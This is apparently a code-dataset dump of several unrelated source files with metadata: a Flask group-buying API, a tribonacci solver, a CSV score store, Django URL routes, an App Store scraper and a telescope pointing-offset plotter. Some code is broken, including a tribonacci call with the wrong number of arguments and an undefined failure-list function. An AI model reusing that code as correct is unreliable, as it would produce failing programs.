CACHE_HIT_STATS\n )\n\n try:\n if current_app.config['REDIS_CACHE']:\n key = GROUPS_API_GET.KEY\n group_field = GROUPS_API_GET.GROUPS_FIELD.format(page=page)\n pager_field = GROUPS_API_GET.PAGER_FIELD.format(page=page)\n\n r = RedisApp()\n\n cache_group = r.hgetJson(key, group_field)\n cache_pager = r.hgetJson(key, pager_field)\n\n dayid = arrow.utcnow().to('local').format('YYYYMMDD')\n hit_key = CACHE_HIT_STATS.KEY.format(dayid=dayid)\n\n if cache_group and cache_pager:\n\n list_group_cache_stats(\n hit_key, CACHE_HIT_STATS.GROUPS_API_GET_FIELD_CACHE, 1)\n list_group_cache_stats(\n hit_key, CACHE_HIT_STATS.GROUPS_API_GET_FIELD_DB, 0)\n return make_response(jsonify({\"groups\": cache_group, 'pager': cache_pager, 'messages': ''}), 200)\n list_group_cache_stats(\n hit_key, CACHE_HIT_STATS.GROUPS_API_GET_FIELD_CACHE, 0)\n list_group_cache_stats(\n hit_key, CACHE_HIT_STATS.GROUPS_API_GET_FIELD_DB, 1)\n\n current_app.logger.info('Gropus get() Redis no cache')\n\n p = Pager(per, page)\n if page > 1:\n prev = True\n groups = GroupHeadModel.query.filter_by(\n status=GroupStatus.GROUPING).order_by(GroupHeadModel.create_dt.desc()).offset(p.offset).limit(p.limit)\n nextp = Pager(per, page + 1)\n nextgroups = GroupHeadModel.query.filter_by(\n status=GroupStatus.GROUPING).order_by(GroupHeadModel.create_dt.desc()).offset(nextp.offset).limit(nextp.limit).count()\n if nextgroups:\n next = True\n pager = {\n 'prev': prev,\n 'next': next,\n 'per': per,\n 'page': page\n }\n listgroups = [g.to_json for g in groups]\n\n if current_app.config['REDIS_CACHE']:\n params = []\n i_params = [(group_field, listgroups), (pager_field, pager)]\n for i_param in i_params:\n param = {\n 'key': key,\n 'field': i_param[0],\n 'data': i_param[1]\n }\n params.append(param)\n from redisapp import hsetRedisKeys\n hsetRedisKeys(params)\n\n return make_response(jsonify({\"groups\": listgroups, 'pager': pager, 'messages': ''}), 200)\n except Exception as e:\n current_app.logger.exception('Gropus get()')\n sendException(e, 'Groups get()')\n return make_response(jsonify({\"messages\": errMsgs.SERVER_ERROR}), 500)\n\n @logit\n def post(self):\n \"\"\"创建团\"\"\"\n\n try:\n if current_user.is_authenticated():\n if current_user.has_alipay():\n groupparam = {\n 'title': request.form['title'],\n 'group_mode': request.form['group_mode'],\n 'transportorg': request.form['transportorg'],\n 'transporturl': request.form['transporturl'],\n 'transport': request.form['transport'],\n 'transporttype': request.form['transporttype'],\n # 前端提交的数据可能是 13. 通过int()处理\n 'plantransportfee': int(request.form['plantransportfee']),\n # 前端提交的数据可能是 13. 通过int()处理\n 'deposit': int(request.form['deposit']),\n 'expresstype': request.form['expresstype'],\n 'customexpressorg': request.form['customexpressorg'],\n 'defaultexpressorg': request.form['defaultexpressorg'],\n 'notes': request.form['notes'],\n 'plancompletedt': request.form['plancompletedt'],\n 'create_userid': current_user.id\n }\n rs = group_operator.createGroup(**groupparam)\n if rs:\n weiboparam = {\n 'body': groupparam.get('title'),\n 'url': 'http://pinpin.in/#group/' + str(rs),\n 'nickname': current_user.nickname\n }\n if not current_user.activate_grouper:\n mailparam = {\n 'reciver': current_user.email\n }\n sendNewGrouperHelp(**mailparam)\n current_user.activate_user_prop('grouper')\n notify(**weiboparam)\n return make_response(jsonify({'id': rs}), 201)\n return make_response(jsonify({'messages': errMsgs.SERVER_ERROR}), 501)\n return make_response(jsonify({'messages': errMsgs.NOT_LINK_ALIPAY}), 403)\n return make_response(jsonify({'messages': errMsgs.NOT_LOGIN}), 401)\n except Exception as e:\n current_app.logger.exception('Groups post()')\n sendException(e, 'Groups post()')\n return make_response(jsonify({'messages': errMsgs.SERVER_ERROR}), 500)\n\n\nclass Group(Resource):\n\n @logit\n def get(self, id):\n \"\"\"返回团信息\"\"\"\n try:\n g = GroupHeadModel.query.filter_by(group_no=id).first()\n if g:\n isauth = current_user.is_authenticated()\n uid = current_user.id if isauth else 0\n isowner = True if g.create_userid == uid else False\n ishasOrder = '0' if not current_user.is_authenticated else order_operator.hasOrder(\n g.id, uid)\n canBuy = True if g.status == GroupStatus.GROUPING else False\n permission = {\n 'isauth': isauth,\n 'isowner': isowner,\n 'hasOrder': ishasOrder,\n 'canBuy': canBuy\n }\n return make_response(jsonify({\"group\": g.to_json, 'permission': permission}), 200)\n return make_response(jsonify({'messages': errMsgs.NOT_EXIST}), 404)\n except Exception as e:\n current_app.logger.exception('Group get()')\n sendException(e, 'Group get()')\n return make_response(jsonify({'messages': errMsgs.SERVER_ERROR}), 500)\n\n\nclass MyGroups(Resource):\n\n def get(self):\n \"\"\"分页返回登陆用户团列表,按创建时间倒序\"\"\"\n\n if current_user.is_authenticated():\n next = False\n prev = False\n try:\n per = request.args.get('per')\n page = request.args.get('page')\n except:\n per = 10\n page = 1\n try:\n per = int(per)\n page = int(page)\n except:\n per = 10\n page = 1\n try:\n p = Pager(per, page)\n if page > 1:\n prev = True\n uid = current_user.id\n groups = GroupHeadModel.query.filter_by(create_userid=uid).order_by(\n GroupHeadModel.create_dt.desc()).offset(p.offset).limit(p.limit)\n nextp = Pager(per, page + 1)\n nextgroups = GroupHeadModel.query.filter_by(create_userid=uid).order_by(\n GroupHeadModel.create_dt.desc()).offset(nextp.offset).limit(nextp.limit).count()\n if nextgroups:\n next = True\n pager = {\n 'prev': prev,\n 'next': next,\n 'per': per,\n 'page': page\n }\n return make_response(jsonify({\"groups\": [g.to_hasOrderjson for g in groups], 'pager': pager}), 200)\n except Exception as e:\n current_app.logger.exception('MyGroups get()')\n sendException(e, 'MyGroups get()')\n return make_response(jsonify({'messages': errMsgs.SERVER_ERROR}), 500)\n return make_response(jsonify({'messages': errMsgs.NOT_LOGIN}), 401)\n","sub_path":"api/group/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":9842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"143045036","text":"def multiply(a, b): \n \n # Creating an auxiliary matrix \n # to store elements of the \n # multiplication matrix \n mul = [[0 for x in range(3)] \n for y in range(3)]; \n for i in range(3): \n for j in range(3): \n mul[i][j] = 0; \n for k in range(3): \n mul[i][j] += a[i][k] * b[k][j]\n \n # storing the multiplication \n # result in a[][] \n for i in range(3): \n for j in range(3): \n a[i][j] = mul[i][j] # Updating our matrix \n return a\n\ndef power(a,b,c,F, n): \n M = [[1, 1, 1], [1, 0, 0], [0, 1, 0]]\n \n # Multiply it with initial values i.e \n # with F(0) = 0, F(1) = 1, F(2) = 1 \n # if (n == 1): \n # return F[0][0] + F[0][1]; \n if (n == 1): \n return a\n \n if (n == 2): \n return b\n \n if( n == 3):\n return c\n \n power(a,b,c,F, int(n / 2)); \n \n F = multiply(F, F); \n \n if (n % 2 != 0): \n F = multiply(F, M)\n \n # Multiply it with initial values i.e \n # with F(0) = 0, F(1) = 1, F(2) = 1 \n return F[0][0] + F[0][1]\n\ndef tribonacci(a,b,c,i):\n T = [[ 1, 1, 1 ], \n [1, 0, 0 ], \n [0, 1, 0 ]]\n\n # base condition \n if (i == 1): \n return a\n \n if (i == 2): \n return b\n \n if( i == 3):\n return c\n\n else:\n power(T, i - 2)\n \n return T[0][0]\n\ndef solve(a,b,c,i):\n \n MOD = 1000000007\n i = i % MOD\n\t# compute and return answer here\n while(i > 3):\n i = i - 3\n a = a + b + c\n b = b + c + a\n c = c + a + b\n\n arr = [a,b,c]\n return arr[i-1]\n\n \na, b, c, i = list(map(int,input().rstrip().split(\" \")))\n# print(solve(a,b,c,i + 1))\nprint(tribonacci(a,b,c,i))","sub_path":"empress/customtribonacci.py","file_name":"customtribonacci.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"215277602","text":"import json\nimport os\nfrom cStringIO import StringIO\nimport shutil\nimport tempfile\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.externals import joblib\n\nfrom source.storage.io_handlers.interface import IOHandlerInterface\nfrom source.storage.stores.merged_scores_store.interface import MergedScoresStoreInterface\nfrom source.storage.stores.merged_scores_store.types import MergedScores, MergerPerformance, MergerModel, \\\n MergedScoresMetadata, MergerMetadata\n\n\nclass CSVMergedScoresStore(MergedScoresStoreInterface):\n def __init__(self, io_handler):\n \"\"\"\n @type io_handler: L{IOHandlerInterface}\n \"\"\"\n self.__io_handler = io_handler\n\n def store_merged_scores(self, merged_scores):\n \"\"\"\n @type merged_scores: L{MergedScores}\n \"\"\"\n metadata = merged_scores.metadata\n base_output_path = self.__get_base_merged_scores_path(metadata)\n self.__io_handler.save_raw_data(self.__get_df_as_text(merged_scores.all_merged_scores),\n os.path.join(base_output_path, 'merged_scores.csv'))\n self.__io_handler.save_raw_data(self.__get_df_as_text(merged_scores.merged_suspects_scores),\n os.path.join(base_output_path, 'merged_suspects.csv'))\n metadata_path = self.__get_merger_metadata_path(metadata)\n self.__io_handler.save_raw_data(json.dumps(metadata.merger_metadata.to_dict(), indent=2, allow_nan=False),\n metadata_path)\n\n def load_merger_metadata(self, metadata):\n metadata_path = self.__get_merger_metadata_path(metadata)\n real_metadata = MergerMetadata.from_dict(json.loads(self.__io_handler.load_raw_data(metadata_path)))\n return real_metadata\n\n def load_merged_scores(self, metadata):\n \"\"\"\n @type metadata: L{MergedScoresMetadata}\n @return: Loaded merged scores according to the given metadata\n @rtype: L{MergedScores}\n @raise LookupError: When scores don't exist\n \"\"\"\n base_output_path = self.__get_base_merged_scores_path(metadata)\n all_scores_df = pd.read_csv(StringIO(self.__io_handler.load_raw_data(os.path.join(base_output_path,\n 'merged_scores.csv'))),\n index_col=0)\n all_scores_df.index = all_scores_df.index.astype(int)\n suspects_scores_path = os.path.join(base_output_path, 'merged_suspects.csv')\n suspects_scores_df = pd.read_csv(StringIO(self.__io_handler.load_raw_data(suspects_scores_path)), index_col=0)\n suspects_scores_df.index = suspects_scores_df.index.astype(float)\n metadata_path = self.__get_merger_metadata_path(metadata)\n real_metadata = MergerMetadata.from_dict(json.loads(self.__io_handler.load_raw_data(metadata_path)))\n return MergedScores(all_scores_df, suspects_scores_df, real_metadata)\n\n def store_merged_performance(self, performance_object, is_stable):\n \"\"\"\n @type performance_object: L{MergerPerformance}\n \"\"\"\n output_path = self.__get_base_merged_performance_path(performance_object.metadata, is_stable)\n self.__io_handler.save_raw_data(performance_object.df.to_csv(encoding='utf-8'), output_path)\n\n def load_merged_performance(self, metadata):\n \"\"\"\n @type metadata: L{MergedPerformanceMetadata}\n \"\"\"\n input_path = self.__get_base_merged_performance_path(metadata, is_stable=False)\n performance_df = pd.read_csv(StringIO(self.__io_handler.load_raw_data(input_path)), index_col=0)\n return MergerPerformance(performance_df, metadata)\n\n def store_merger_model(self, merger_model):\n \"\"\"\n @type merger_model: L{MergerModel}\n \"\"\"\n path = self.__get_base_merged_model_path(merger_model.metadata)\n local_temp_path = tempfile.mkdtemp()\n joblib.dump(merger_model.model, os.path.join(local_temp_path, 'model.pkl'))\n for f in os.listdir(local_temp_path):\n with open(os.path.join(local_temp_path, f), 'rb') as binary_file:\n path = os.path.join(path, f)\n self.__io_handler.save_raw_data(binary_file.read(), path)\n shutil.rmtree(local_temp_path)\n\n @staticmethod\n def __get_base_mergers_path(customer, quest_id, query_id):\n path = os.path.join('sandbox-{}'.format(customer), 'Quests', quest_id, query_id, 'mergers')\n return path\n\n @staticmethod\n def __get_base_merged_performance_path(metadata, is_stable):\n \"\"\"\n @type metadata: L{MergedPerformanceMetadata}\n @rtype: C{str}\n \"\"\"\n merged_scores_metadata = metadata.merged_scores_metadata\n path = os.path.join('sandbox-{}'.format(merged_scores_metadata.customer), 'Quests',\n merged_scores_metadata.quest_id, merged_scores_metadata.query_id,\n 'mergers' if not is_stable else 'stable_mergers',\n merged_scores_metadata.merger_metadata.merger_id,\n 'artifacts', 'results_summary', '{}.csv'.format(metadata.performance_type))\n return path\n\n @staticmethod\n def __get_base_merged_scores_path(metadata):\n \"\"\"\n @type metadata: L{MergedScoresMetadata}\n @rtype: C{str}\n \"\"\"\n path = os.path.join('sandbox-{}'.format(metadata.customer), 'Quests', metadata.quest_id,\n metadata.query_id, 'mergers', metadata.merger_metadata.merger_id, 'scores')\n return path\n\n @staticmethod\n def __get_base_merged_model_path(metadata):\n \"\"\"\n @type metadata: L{MergedScoresMetadata}\n \"\"\"\n output_path_join = os.path.join('sandbox-{}'.format(metadata.customer), 'Quests',\n metadata.quest_id, metadata.query_id,\n 'mergers', metadata.merger_metadata.merger_id,\n 'artifacts', 'models')\n return output_path_join\n\n @staticmethod\n def __get_merger_metadata_path(metadata):\n \"\"\"\n @type metadata: L{MergedScoresMetadata}\n @rtype: C{str}\n \"\"\"\n output_path_join = os.path.join('sandbox-{}'.format(metadata.customer), 'Quests', metadata.quest_id,\n metadata.query_id, 'mergers', metadata.merger_metadata.merger_id,\n 'metadata.json')\n\n return output_path_join\n\n @staticmethod\n def __get_df_as_text(df):\n \"\"\"\n @type df: C{DataFrame}\n @rtype: C{str}\n \"\"\"\n scores_arr = np.c_[df.index, df.values]\n num_scorers = len(df.columns)\n save_format = \",\".join([\"%15.0f\"] + [\"%.25f\"] * num_scorers)\n header = \",\".join([\"idnum\"] + list(df.columns.values))\n all_scores_data = StringIO()\n np.savetxt(all_scores_data, scores_arr, fmt=save_format, header=header, comments=\"\")\n return all_scores_data.getvalue()\n\n def load_all_merger_ids(self, customer, quest_id, query_id):\n \"\"\"\n @type customer: C{str}\n @type quest_id: C{str}\n @type query_id: C{str}\n @return: The list of all merger ids\n @rtype: C{List}\n \"\"\"\n mergers_path = self.__get_base_mergers_path(customer, quest_id, query_id)\n all_merger_paths = list(self.__io_handler.list_dir(mergers_path))\n # merger_ids = [os.path.basename(os.path.split(os.path.split(full_name)[0])[0]) for full_name in all_merger_paths\n # if \"merged_scores.csv\" in full_name]\n merger_ids = [os.path.basename(full_name) for full_name in all_merger_paths]\n return merger_ids\n\n","sub_path":"source/storage/stores/merged_scores_store/csv_store.py","file_name":"csv_store.py","file_ext":"py","file_size_in_byte":7793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"109479720","text":"from django.conf.urls import url, include\nfrom rest_framework import routers\nfrom api import views\n\nurlpatterns = [\n url(r'^user/$', views.user_list), # GET, POST\n url(r'^user/(?P[0-9]+)/$', views.user_detail), # GET, PUT, DELETE\n\n url(r'^company/$', views.company_list), # GET, POST\n url(r'^company/(?P[0-9]+)/$', views.company_detail), # GET, PUT, DELETE\n\t\n\turl(r'^insurer/$', views.insurer_list), # GET, POST\n url(r'^insurer/(?P[0-9]+)/$', views.insurer_detail), # GET, PUT, DELETE\n url(r'^insurer/(?P[0-9]+)/formulary/$', views.formulary_list), # GET, POST\n\n\turl(r'^pharma/$', views.pharma_list), # GET, POST\n url(r'^pharma/(?P[0-9]+)/$', views.pharma_detail), # GET, PUT, DELETE\n url(r'^pharma/(?P[0-9]+)/drug/$', views.drug_list), # GET, POST\n\n url(r'^drug/$', views.all_drugs_list), # GET, POST\n url(r'^drug/(?P[0-9]+)/$', views.all_drugs_detail), # GET, PUT, DELETE\n\n url(r'^formulary/$', views.all_formularies_list), # GET, POST\n url(r'^formulary/(?P[0-9]+)/$', views.all_formularies_detail), # GET, PUT, DELETE\n\n url(r'^formulary/(?P[0-9]+)/entry/$', views.post_formulary_entry), # POST\n url(r'^formulary/(?P[0-9]+)/entry/(?P[0-9]+)/$', views.formulary_entry_detail), # GET, PUT, DELETE\n\n url(r'^formulary/(?P[0-9]+)/tier/$', views.tier_list), # GET, POST\n url(r'^formulary/(?P[0-9]+)/tier/(?P[0-9]+)/$', views.tier_detail), # PUT, DELETE\n\n # These are endpoints for bulk POST/PUT, as discussed SGM 03/13/2018\n url(r'^formulary/(?P[0-9]+)/tiers/$', views.bulk_tier_actions), # POST, PUT\n url(r'^formulary/(?P[0-9]+)/entries/$', views.bulk_formulary_entry_actions), # POST, PUT\n\n # # Orders endpoint for pharma\n # url(r'^pharma/(?P[0-9]+)/order/$', views.order_list),\n]","sub_path":"Legacy/Backend/torque_backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"202498773","text":"#!/usr/bin/python3\nimport os, sys, re\nimport socket\nimport random\n\nfrom state import SharedState\nfrom testutil import *\nimport urlutil\nimport util\nimport myparser\nimport config\nimport pickle\n\n# used as the data folder name\ntask_name = \"AppleDownload\"\nnewstart = True\ntask_folder = os.path.join(config.here, 'data', task_name)\ntask_statepath = os.path.join(task_folder, 'state.pickle')\nallurls_filepath = os.path.join(task_folder, 'ios_appurls.pickle')\n\ndef url_to_id(url):\n \"\"\" eg https://itunes.apple.com/us/app/bugs-wars/id406313428 \"\"\"\n url = url[32:]\n end = url.rfind('?')\n if end != -1:\n url = url[:end]\n return url\n\ndef id_to_url(id):\n return \"https://itunes.apple.com/us/app/%s?mt=8\" % id\n\ndef init():\n \"\"\"\n Gloabl Initialization routine for task\n \"\"\"\n\n \"\"\" Create SharedState and give it runf \"\"\"\n state = SharedState(task_name)\n state.runf = runf\n state.taskfolder = task_folder\n state.statepath = task_statepath\n\n all_urlset = set(util.Pickler(allurls_filepath).load())\n oldres = util.aggregate_res(task_folder, trans = lambda a : a['url'])\n old_urlset = set(oldres)\n\n initial_idset = all_urlset.difference(old_urlset)\n\n print('# of urls %d ' % len(initial_idset))\n\n \"\"\" Necessary step, initialize the task queue \"\"\"\n for job in initial_idset:\n state.queue.put(job)\n\n return state\n\ndef runf(self, job, debug=False):\n \"\"\"\n job is given, task_done will be called, but still need to handle various locks\n \"\"\"\n with self.state.master_lock:\n pass\n\n try:\n page = urlutil.getpage_unicode(job)\n res = myparser.parse_appstore_apppage(page)\n res['id'] = url_to_id(job)\n self.state.resultlist.append(res)\n\n except config.IDError as e:\n print(str(e))\n add_to_faillist(job)\n\n except IndexError as e:\n yellowprint('index error happends (app no dev?), url is %s' % job)\n add_to_faillist(job)\n self.state.faillist.append(job)\n\ndef main():\n import downloader\n downloader.start(init)\n\nif __name__ == '__main__':\n main()\n","sub_path":"task_download_appleappstore.py","file_name":"task_download_appleappstore.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"332858210","text":"from __future__ import unicode_literals\nfrom django.db import models \nfrom apirest.utils.constants import Constants\n\nclass ExpedienteOriginaDespacho(models.Model):\n id = models.AutoField(primary_key=True,db_column='expediente_origina_despacho_id')\n fk_expediente = models.ForeignKey('Proyecto', db_column='fk_expediente')\n fk_despacho = models.ForeignKey('Despacho', db_column='fk_despacho')\n orden = models.SmallIntegerField(blank=True, null=True)\n solo_vista = models.CharField(max_length=1, blank=True,db_column='bsolovista')\n \n class Meta:\n managed = False\n db_table = Constants().EXPEDIENTE_ORIGINA_DESPACHO\n app_label = Constants().APIREST","sub_path":"ServiciosParlamentarios/apirest/models/expedientes/expediente_origina_despacho.py","file_name":"expediente_origina_despacho.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"507955057","text":"#!/common/anaconda3/bin/python\n\nimport os,fnmatch,sys,glob,re\nfrom datetime import datetime\nfrom io import StringIO\nfrom bokeh.plotting import figure, show, output_file\nfrom bokeh.layouts import gridplot\nfrom bokeh.models import ColumnDataSource,ColorBar\nfrom bokeh.palettes import viridis\nfrom bokeh.transform import linear_cmap\nfrom bokeh.io import save\nimport numpy as np\nimport math as m\nimport sys\nimport time\nimport pandas as pd\n\nantenna = sys.argv[1]\nreceiver = sys.argv[2]\nmodelUpdateDate = datetime.strptime(sys.argv[3],'%d %b %Y')\n# last model update date in format e.g.: 18 Jul 2018\n\n# for saving a pdata file for fitting etc.\nsavePdata = int(sys.argv[4])\n\ntoday = time.strftime(\"%d%b%Y\")\n\nif int(receiver) == 230:\n receiverCode = \"A1\"\n Rx = \"RxA\"\nif int(receiver) == 345:\n receiverCode = \"B1\"\n Rx = \"RxA\"\nif int(receiver) == 240:\n receiverCode = \"E\"\n Rx = \"RxB\"\nif int(receiver) == 400:\n receiverCode = \"C\"\n Rx = \"RxB\"\n\nplottitle = \"Antenna-\"+antenna + \" \" + \" \" + receiver + \" GHz \" + today\n\noutputHTMLfileName = \"ant\"+antenna+\"_\"+receiver+\"_\"+today+\".html\"\npdataFile = \"pdata_\"+antenna+\"_\"+receiver+\"_\"+today+\".txt\"\n\nipointDirectory = \"/sma/rtdata/engineering/ipoint/ant\"+antenna+\"/\"\n\n\nlistOfFiles = os.listdir(ipointDirectory)\n#for entry in listOfFiles:\n# if fnmatch.fnmatch(entry,pattern):\n# print(entry)\nfiles_path = os.path.join(ipointDirectory,\"??????\")\nfiles = sorted(glob.iglob(files_path),key=os.path.getctime,reverse=True)\nfilesToCat = []\nfor file in files:\n print(file)\n t = os.path.getctime(file)\n fileDate = datetime.fromtimestamp(t)\n filesToCat.append(file)\n if (fileDate <= modelUpdateDate):\n break\n#concat = ''.join([open(f).read() for f in files])\n#print(concat)\noutput = StringIO()\nfor f in filesToCat:\n with open(f,encoding='latin-1') as infile:\n line = infile.read()\n output.write(line+'\\n')\nconcatenatedFileContent = output.getvalue()\noutput.close()\n\nno=[]\nsourcename=[]\naz=[]\nel=[]\nazoff=[]\neloff=[]\nazofferr=[]\nelofferr=[]\nutc=[]\ntimestamp=[]\n\nif (savePdata==1):\n pF = open(pdataFile,'w')\nsNo=1\nfor line in StringIO(concatenatedFileContent):\n if Rx in line:\n if receiverCode in line:\n columns = line.split(',')\n try:\n sourcename.append(columns[3])\n az.append(float(columns[40]))\n el.append(float(columns[41]))\n azoff.append(float(columns[119]))\n eloff.append(float(columns[121]))\n azofferr.append(float(columns[120]))\n elofferr.append(float(columns[122]))\n utc.append(float(columns[16]))\n timestamp.append(columns[108])\n no.append(sNo)\n pLine = ('%d %s %f %f %f %f %f %f %f %s\\n') % \\\n (sNo,columns[3],float(columns[40]),float(columns[41]),\\\n float(columns[119]),float(columns[121]),float(columns[120]),\\\n float(columns[122]),float(columns[16]),columns[108])\n if (savePdata==1):\n pF.write(pLine)\n except ValueError:\n continue\n sNo = sNo+1\n\nif (savePdata==1):\n pF.close()\n\n\n#dayVsNight = ['#0000cc','#0000cc','#0000cc','#0000cc',\n#'#0066ff','#6666ff','#6600ff','#9727bc','#ff8000','#ff5050','#ff0000','#ff0000']\n\ndayVsNight = ['#0000cc','#0000cc','#0000cc','#0000cc','#0000cc','#6666ff','#6600ff','#ff0000','#ff0000','#ff0000','#ff0000','#ff0000']\n\ndaylightH = []\nfor hour in utc:\n hour = hour-10.\n if (hour < 0.):\n hour = hour + 24.\n if (hour >= 12.):\n daylightH.append(24.-hour)\n else:\n daylightH.append(hour)\n\nerr_el=[]\nerr_az=[]\nerr_azofferr=[]\nerr_elofferr=[]\nfor x,y,yerr in zip(el,azoff,azofferr):\n err_el.append((x,x))\n err_azofferr.append((y-yerr,y+yerr))\nfor x,y,yerr in zip(az,azoff,azofferr):\n err_az.append((x,x))\nfor x,y,yerr in zip(el,eloff,elofferr):\n err_elofferr.append((y-yerr,y+yerr))\n\nmapper = linear_cmap(field_name='daylightH',palette=dayVsNight,low=0.0,high=12.0)\n\nTimestamp = []\nfor timeStamp in timestamp:\n# ts = pd.to_datetime(timeStamp.decode('UTF-8'), format='%d%b%y_%H%M%S') \n ts = pd.to_datetime(timeStamp, format='%d%b%y_%H%M%S') \n Timestamp.append(ts)\n\nsname = []\nfor s in sourcename:\n# sname.append(s.decode('UTF-8'))\n sname.append(s)\n\ntstamp = []\nfor t in timestamp:\n# tstamp.append(t.decode('UTF-8'))\n tstamp.append(t)\n\n\noutput_file(outputHTMLfileName)\n\nsource = ColumnDataSource(data=dict(az=az,el=el,azoff=azoff,eloff=eloff,azofferr=azofferr,elofferr=elofferr,Timestamp=Timestamp,err_az=err_az,err_el=err_el,err_azofferr=err_azofferr,err_elofferr=err_elofferr,utc=utc,daylightH=daylightH,tstamp=tstamp,sname=sname))\n\nTOOLS = \"tap,reset,save,crosshair,wheel_zoom,box_zoom,box_select,lasso_select\"\nTOOLTIPS = [(\"index\",\"$index\"),(\"sname\",\"@sname\"),(\"tstamp\",\"@tstamp\")]\np1 = figure(title=plottitle, width=400, height=220,x_range=(0,90),tools=TOOLS,tooltips=TOOLTIPS)\np1.yaxis.axis_label='Azimuth offsets (\")'\np1.xaxis.axis_label = 'Elevation (deg)'\np1.circle(x='el',y='azoff',color=mapper,size=7,fill_alpha=1,line_alpha=0,source=source)\np1.circle(x='el',y='azoff',color=mapper,size=7,fill_alpha=1,line_alpha=0,source=source)\np1.square(x=el[-1],y=azoff[-1],fill_color=None,size=12,line_color=\"red\")\np1.multi_line(xs='err_el',ys='err_azofferr',color='black',source=source)\n\np2 = figure(title='',width=400, height=220,x_range=(-180,360),tools=TOOLS,tooltips=TOOLTIPS)\np2.yaxis.axis_label='Azimuth offsets (\")'\np2.xaxis.axis_label = 'Azimuth (deg)'\np2.circle(x='az',y='azoff',color=mapper,size=7,fill_alpha=1,line_alpha=0,source=source)\np2.square(x=az[-1],y=azoff[-1],fill_color=None,size=12,line_color=\"red\")\np2.multi_line(xs='err_az',ys='err_azofferr',color='black',source=source)\n\np3 = figure(title='',width=400, height=220,x_range=(0,90),tools=TOOLS,tooltips=TOOLTIPS)\np3.yaxis.axis_label='Elevation offsets (\")'\np3.xaxis.axis_label = 'Elevation (deg)'\np3.circle(x='el',y='eloff',color=mapper,fill_alpha=1,size=7,line_alpha=0,source=source)\np3.square(x=el[-1],y=eloff[-1],fill_color=None,size=12,line_color=\"red\")\np3.multi_line(xs='err_el',ys='err_elofferr',color='black',source=source)\n\np4 = figure(title='',width=400, height=220,x_range=(-180,360),tools=TOOLS,tooltips=TOOLTIPS)\np4.yaxis.axis_label='Elevation offsets (\")'\np4.xaxis.axis_label = 'Azimuth (deg)'\np4.circle(x='az',y='eloff',color=mapper,fill_alpha=1,size=7,line_alpha=0,source=source)\np4.square(x=az[-1],y=eloff[-1],fill_color=None,size=12,line_color=\"red\")\np4.multi_line(xs='err_az',ys='err_elofferr',color='black',source=source)\n\np5 = figure(title='',width=400, height=220,x_range=(-180,360),tools=TOOLS,tooltips=TOOLTIPS)\np5.yaxis.axis_label='Elevation (deg)'\np5.xaxis.axis_label = 'Azimuth (deg)'\np5.circle(x='az',y='el',color=mapper,fill_alpha=1,size=7,line_alpha=0,source=source)\np5.square(x=az[-1],y=el[-1],fill_color=None,size=12,line_color=\"red\")\n\np6 = figure(title='',width=220, height=220,x_range=(-30,30),y_range=(-30,30),tools=TOOLS,tooltips=TOOLTIPS)\np6.yaxis.axis_label='Eloff (\")'\np6.xaxis.axis_label = 'Azoff (\")'\np6.circle(x='azoff',y='eloff',color=mapper,fill_alpha=1,size=7,line_alpha=0,source=source)\np6.square(x=azoff[-1],y=eloff[-1],fill_color=None,size=12,line_color=\"red\")\n\np7 = figure(x_axis_type='datetime',title='',width=400, height=220,tools=TOOLS,tooltips=TOOLTIPS)\np7.yaxis.axis_label='Azimuth offsets (\")'\np7.xaxis.axis_label = 'Time'\np7.circle(x='Timestamp',y='azoff',color=mapper,fill_alpha=1,size=7,line_alpha=0,source=source)\np7.square(x=Timestamp[-1],y=azoff[-1],fill_color=None,size=12,line_color=\"red\")\n\np8 = figure(x_axis_type='datetime',title='',width=400, height=220,tools=TOOLS,tooltips=TOOLTIPS)\np8.yaxis.axis_label='Elevation offsets (\")'\np8.xaxis.axis_label = 'Time'\np8.circle(x='Timestamp',y='eloff',color=mapper,fill_alpha=1,size=7,line_alpha=0,source=source)\np8.square(x=Timestamp[-1],y=eloff[-1],fill_color=None,size=12,line_color=\"red\")\n#color_bar = ColorBar(color_mapper=mapper['transform'],width=8,)\n#p8.add_layout(color_bar,'right')\n\n\ngrid = gridplot([[p1,p2],[p3,p4],[p5,p6],[p7,p8]],tools=TOOLS,tooltips=TOOLTIPS,toolbar_location=\"below\",merge_tools=True)\n\n#show(grid)\nsave(grid,filename=outputHTMLfileName)\n","sub_path":"offline/Linux/common/pointingModelAnalysis/python/ipointPlot.py","file_name":"ipointPlot.py","file_ext":"py","file_size_in_byte":8286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"625460340","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport nltk\nimport string\nimport sys\nimport unicodedata\n\npreprocessing = [\n (r'http://[^\\s]+', r' -URL- '),\n (r':-?\\)', r' -SMI- '),\n (r':-?\\(', r' -FRN- '),\n (r'\\((\\w)', r' ( \\1'),\n (r'\\)(\\w)', r' ) \\1'),\n (r'\\)\\.', r' ) .'),\n (r'( |^)\\$(\\d+)( |$)', r' $ \\2 '),\n (r'\\.\\.+', r' -DOTS- '),\n (r'@\\w+', r' -USER- '),\n (r'( |^)[%s]+\\w+( |$)' % string.punctuation, r' -EMO- '),\n (r'( |^)h[ha]+( |$)', r' -HA- '),\n (r'( |^)l[lo]+( |$)', r' -LOL- '),\n (r'(( |^)\\w+)\\.', r'\\1 .'),\n #(r'#(\\w+)', r' \\1 '),\n (r'!+', r' -EXCLAM- '),\n (r'\\?+', r' -QUESTION- '),\n (r'( |^)(1$|$1)[$1]*( |$)', r' -1D- '),\n (r'[%s]{2,}' % string.punctuation, r' -PSEQ- '),\n (r'\\|+', r' -BAR- '),\n (r'\\s+', r' '), #Strip extra whitespace\n (r'^\\s+', r''), #Strip leading whitespace\n (r'\\s+$', r''), #Strip trailing 